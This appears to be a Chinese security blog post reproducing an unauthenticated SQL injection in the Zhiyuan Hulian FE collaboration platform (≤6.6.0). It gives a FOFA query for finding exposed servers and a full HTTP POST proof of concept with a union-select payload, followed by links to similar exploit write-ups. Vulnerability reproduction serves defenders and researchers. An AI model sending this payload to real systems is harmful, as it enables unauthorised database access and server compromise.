致远互联FE协作办公平台 SQL注入漏洞复现

已于 2023-12-08 19:30:27 修改
阅读量876 收藏 8
点赞数 10
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-08 19:10:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134885441
版权

0x01 产品简介

 致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。

0x02 漏洞概述

 致远互联FE协作办公平台 editflow_manager.js、validate.jsp等接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。

0x03 影响范围

 FE协作办公平台 <= 6.6.0

0x04 复现环境

FOFA:app="致远互联-FE"

0x05 漏洞复现 

PoC-1

POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Connection: close
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

option=2&GUID=-1%27+union+select+%40%40version--+

查询数据库版本

PoC-2 

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
飞企互联FE业务协作平台ShowImageServlet接口任意文件读取漏洞
xiaokp7的博客
09-13 691
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
【1day】复现飞企互联 FE业务协作平台 ShowImageServlet 接口任意文件读取漏洞
记录并分享学习安全的知识点..
08-22 499
飞企互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作。飞企互联 FE业务协作平台 ShowImageServlet 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件。
漏洞复现】飞企互联-FE企业运营管理平台登录绕过漏洞
weixin_45530380的博客
01-02 468
【代码】【漏洞复现】飞企互联-FE企业运营管理平台登录绕过漏洞
用友致远A6协同办公软件解决专项方案.doc
12-14
用友致远A6协同办公软件解决专项方案.doc
2019年致远互联财务共享业务中台解决方案.pptx
07-21
2019年致远互联财务共享业务中台解决方案.pptx
致远互联笔试题.pdf
07-13
致远互联笔试题.pdf致远互联笔试题.pdf致远互联笔试题.pdf致远互联笔试题.pdf致远互联笔试题.pdf致远互联笔试题.pdf致远互联笔试题.pdf致远互联笔试题.pdf
致远互联 IDC COP协同运营平台白皮书 1029 版
02-18
致远互联 IDC COP协同运营平台白皮书 1029 版
致远OA漏洞复现
热门推荐
混子
12-31 4万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
致远OA SQL&任意文件下载漏洞(含批量检测POC)
今天是几号的博客
03-21 2547
通过信息收集,查出web根目录D:/UFseeyon/OA/tomcat/webapps/yyoa,通过 into outfile 写入文件,这里因为 jsp木马存在特殊符号,使用 hex编码 上传允许文件上传的jsp文件。致远OA webmail.do文件读取漏洞,由于/seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。致远OA A6 test.jsp 存在sql注入漏洞,并可以通过注入写入webshell文件控制服务器。app=“致远互联-OA”
html sql注入_常见SQL注入的方法
weixin_39894233的博客
12-01 1461
WEB安全SQL注入引言:在开发网站的时候,出于安全考虑,需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往给骇客留下了可乘之机。轻则数据遭到泄露,重则服务器被拿下。1、SQL注入步骤a)寻找注入点,构造特殊的语句传入SQL语句可控参数分为两类1. 数字类型,参数不用被引号括起来,如?id=12. 其他类型,参...
致远协同管理平台软件简介.pptx
03-15
致远协同管理平台软件简介致远协同管理平台软件简介致远协同管理平台软件简介致远协同管理平台软件简介致远协同管理平台软件简介
【0day】复现飞企互联 FE业务协作平台 某接口任意文件读取漏洞
记录并分享学习安全的知识点..
10-16 385
飞企互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作。飞企互联 FE业务协作平台某接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件。
飞企互联-FE企业运营管理平台管理员权限登录绕过漏洞复现
qq_39573664的博客
12-29 703
飞企互联FE企业运营管理平台存在一个潜在的安全漏洞,涉及到2.ln接口的登录绕过问题。未经授权的攻击者可以通过构造恶意的URL访问页面,直接进入后台管理页面,获取敏感信息。这种漏洞可能为攻击者提供了进一步控制整个服务器的机会,对系统的安全性构成潜在威胁。
飞企互联FE业务协作平台 ShowImageServlet 文件读取漏洞复现
0xSec
12-21 917
飞企互联 FE 业务协作平台ShowImageServlet接口存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
RSAC 2024观察:软件供应链安全进入AI+时代
lurenjia404的博客
05-15 918
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
高效且安全的传输工具:FileLink跨网文件传输
m0_69398711的博客
05-14 463
同时,它还提供了权限控制功能,例如:文件打开次数、访问时间、禁止截屏、禁止复制、禁止打印、显示水印,有效防止了数据泄露和非法访问。然而,FileLink利用先进的网络技术和协议优化,成功打破了这一局限。它提供广泛的集成支持,权限组件、审批组件均开放API,可与企业现有IT系统充分集成,深度支撑与贯通企业跨网业务流程,致力于打造更全面的数据安全平台。综上所述,FileLink跨网文件传输以其出色的跨网络性能、安全性、多功能性、易用性以及集成扩展能力,成为了现代办公和日常生活中不可或缺的文件传输工具。
安全警钟】APP如何筑起坚不可摧的防御,抵御黑客攻击?
最新发布
NSME1的博客
05-20 139
做好安全防御
Web应用防火墙的重要性
XRY_XIAO的博客
05-20 343
Web应用防火墙的重要性
Llama 3 模型家族构建安全可信赖企业级AI应用之 Code Llama (一)
段智华的博客
05-17 857
1、Llama开源模型家族大模型技术、工具和多模态详解:学员将深入了解Meta Llama 3的创新之处,比如其在语言模型技术上的突破,并学习到如何在Llama 3中构建trust and safety AI。8、Llama 3中的DPO原理、算法、组件及具体实现及算法进阶:学习Llama 3中结合使用PPO和DPO算法,剖析DPO的原理和工作机制,详细解析DPO中的关键算法组件,并通过综合项目八从零开始动手实现和测试DPO算法,同时课程将解密DPO进阶技术Iterative DPO及IPO算法。
致远m3协同办公平台远程命令执行漏洞
01-09
致远m3协同办公平台是一款常用的企业协同办公软件,然而最近发现了该平台存在远程命令执行漏洞。这个漏洞的存在意味着攻击者可以通过发送特定的命令来执行恶意操作,从而危害到企业的信息安全。 这个漏洞可能导致以下几种潜在风险:首先,攻击者可以利用漏洞来获取系统权限,进而窃取敏感信息或者破坏系统正常运行;其次,攻击者可以利用漏洞来植入恶意程序,对企业信息系统进行攻击和破坏;最后,攻击者还可以利用漏洞来传播恶意软件,进而影响到整个企业内部网络的安全。 为了解决这个漏洞带来的风险,企业需要立即采取行动。首先,应及时对致远m3协同办公平台进行补丁升级,以修复漏洞并加强系统安全性;其次,企业需要加强对员工的安全意识教育,提高员工对网络安全风险的认识,避免点击和打开未知来源的链接和附件;最后,企业还需要加强对网络安全的监控和管理,及时发现并应对潜在的安全威胁。 总之,致远m3协同办公平台的远程命令执行漏洞是一项严重的安全威胁,企业需要及时采取措施来应对这一风险,确保企业的信息系统安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值